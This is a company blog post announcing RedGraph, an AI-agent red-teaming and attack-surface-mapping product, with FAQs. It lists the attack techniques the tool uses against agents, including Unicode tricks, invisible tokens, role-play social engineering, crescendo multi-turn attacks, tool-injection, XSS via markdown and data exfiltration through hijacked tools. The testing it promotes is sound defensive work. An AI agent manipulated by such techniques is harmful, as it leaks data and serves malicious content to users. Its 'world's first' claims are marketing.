Blog
min read
Pillar Security Unveils RedGraph: The World’s First Attack Surface Mapping & Continuous Testing for AI Agents
Today we're excited to announce RedGraph, the world's first attack surface mapping and testing tool for AI agents that enables security teams to discover and validate real exploits in their AI agents continuously. It interacts with AI systems through the browser and works with any web-accessible AI agent, including those built on Microsoft Copilot, Salesforce Agentforce, Google Agentspace, n8n, and more. All findings are exploit-validated and flow directly into Pillar's adaptive guardrails, creating a closed loop where defenses improve continuously alongside the testing.
Why we built it
Security teams own AI agent security, but current tools only test AI models in isolation, divorced from the databases, APIs, tools, and internal data they connect to once deployed. This creates a complex attack surface that existing security testing completely misses. Traditional AI red teaming might give a clean bill of health for the model itself, but it can't see the business logic flaws and attack paths that emerge from the agent's real-world integrations.
RedGraph takes a fundamentally different approach: by directly interacting with your AI agent in its actual environment at runtime, it maps the entire attack surface - every connection, every permission, every potential pivot point from prompt to backend system, then feeds those findings into adaptive guardrails for immediate remediation
We built RedGraph together with our customers - based on their insights, feedback, and real challenges. They're already using it in production:
“We have numerous AI initiatives throughout the company. Unlike traditional red teaming, RedGraph continuously validates vulnerabilities in our AI agents' attack surface in production, providing complete attack paths that the engineering team can fix immediately. This marks a significant improvement in our security measures,” said Tomer Maman, CISO at Similarweb, a Pillar Security customer.״. Said Tomer Maman, CISO at Similarweb
.webp)
Why This Changes the Game for Security Teams
How it works:
RedGraph performs active reconnaissance to build a threat model of your specific business logic, then launches coordinated, multi-turn attacks to exploit system-level vulnerabilities. It bridges the gap between technical complexity and business oversight, allowing stakeholders to see exactly how an AI agent can compromise the organization.
This approach delivers four critical advantages:
1. Low Friction, High Visibility.
Security shouldn't be a black box accessible only to engineers. RedGraph creates a low-friction method for implementing red team assessments. Simply provide a target URL or authenticate like a real user, and RedGraph handles the rest, making continuous AI security accessible to non-technical stakeholders.
.webp)
2. We Map the Kill Chain, Not Just the Assets.
Most tools give you a list of fuzzed prompts. RedGraph gives you a living map. It visualizes the complex web of your AI estate, showing exactly which agent can call which tool and where those tools connect to external systems. This graph-first view reveals the attack paths that actually matter.
.webp)
3. We Don't Guess. We Exploit.
This is the critical difference. RedGraph doesn't just flag that your "fetch_website" tool might be vulnerable to injection - it actively attempts to exploit it. The adversarial agents probe your application, pivot when blocked, and find the cracks in your business logic.
.webp)
4. We Hand You the Fix.
Security teams are tired of fighting with developers over theoretical risks. With RedGraph, you get exploit-validated proof. You can hand your engineering team a transcript/evidence showing exactly how the attack happened. Better yet, these findings feed directly into Pillar's adaptive guardrails, allowing you to automatically harden the system against the specific attack vectors we discovered.
.webp)
Key Capabilities
Graph-First Attack-Path View
RedGraph represents your AI estate as nodes (assistants, agents, roles, tools,MCP servers, datasets, SaaS apps) and edges (can-call, can-read, can-render, has-permission). This illuminates unintended relationships and the paths they enable, showing you where real risk accumulates.
Business Context Awareness
RedGraph doesn't launch blind attacks. It applies application context to find business logic flaws, prioritize what matters, and map results directly to your threat landscape - minimizing noise and maximizing relevance.
Real-Time Adaptability
During assessments, agents dynamically adjust their tactics. If a path is blocked, they pivot - demonstrating attack behavior that ensures if there's a way in, RedGraph will find it, even as systems evolve.
What RedGraph Tests
RedGraph blends AI-specific risk analysis with web application security, providing visibility into the real-world weaknesses of agentic systems.
AI Model-Based Risks:
- Threat-surface mapping: Reveals hidden roles, tools, capabilities, and unintended pathways the AI can reach
- Attack-path flow analysis: Uses a graph view of your workflows to spot chained manipulations and multi-turn escalation attempts, then validates the path end-to-end
- Evasion & deception: Exercises Unicode tricks, invisible tokens, adversarial formatting, role-play social engineering, and crescendo (multi-turn) sequences to pressure-test defenses
Web Application Risks:
- Unsafe markdown rendering: Detects when the AI can be manipulated into generating malicious Markdown or code blocks that execute XSS payloads within the user interface
- Malicious link rendering: Finds cases where the agent is coerced into hallucinating or serving phishing URLs that the application renders as trusted, clickable links.
- Data-exfiltration vectors: Exercises how the agent’s legitimate access to tools (like file uploads or API connectors) can be hijacked to bypass controls and leak sensitive context.
Advanced, Effective, and Built for the Agentic Era
We built RedGraph on a simple premise: the best defense against autonomous AI systems is an autonomous adversary. This is the world's first AI Attack Surface Management capability embedded within a comprehensive security platform, creating something fundamentally new. This approach delivers a recursive defense model where offense and defense evolve together. Every vulnerability RedGraph discovers flows directly into Pillar's adaptive guardrails, transforming your security posture from static protection into a living system that learns and strengthens with every assessment.
RedGraph is available and already in use with Fortune 500 and innovative companies, visit pillar.security/redgraph to schedule a demonstration or contact sales@pillar.security.
FAQs
What is RedGraph and how does it differ from traditional AI red teaming tools?
RedGraph is the world's first attack surface mapping and continuous testing tool for AI agents. Unlike traditional red teaming tools that test AI models in isolation, RedGraph interacts with agents in their actual runtime environment, mapping every connection, permission, and pivot point from prompt to backend system — including databases, APIs, tools, and internal data integrations.
How does RedGraph validate vulnerabilities in AI agents rather than just flagging theoretical risks?
RedGraph actively attempts to exploit discovered vulnerabilities rather than simply flagging them. Adversarial agents probe the application, pivot when blocked, and target business logic flaws in real-world integrations. Every finding is exploit-validated, and security teams receive full attack transcripts showing exactly how an attack succeeded — eliminating disputes over theoretical risk.
What AI agent platforms and frameworks does RedGraph support?
RedGraph works with any web-accessible AI agent by interacting through the browser. Supported platforms include Microsoft Copilot, Salesforce Agentforce, Google Agentspace, and n8n, among others. Integration requires only a target URL or user authentication credentials, making it accessible to both technical and non-technical stakeholders without code changes.
What types of attack vectors does RedGraph test in agentic AI systems?
RedGraph tests both AI-specific and web application risks. On the AI side, it covers threat-surface mapping, multi-turn attack-path analysis, and evasion techniques including Unicode tricks, invisible tokens, and crescendo sequences. Web application tests include unsafe markdown rendering, malicious link injection, and data-exfiltration vectors via hijacked tool access like file uploads or API connectors.
How does RedGraph connect continuous testing to ongoing defense improvements in AI deployments?
RedGraph creates a closed-loop defense model by feeding every exploit-validated finding directly into Pillar Security's adaptive guardrails. This transforms security posture from static protection into a living system that hardens automatically against the specific attack vectors discovered. Similarweb's CISO described it as providing complete attack paths that engineering teams can fix immediately in production.
Subscribe and get the latest security updates
Back to blog

%20(1).png)

.webp)
.png)

%20(1).webp)
%20(1).png)
%20(1).png)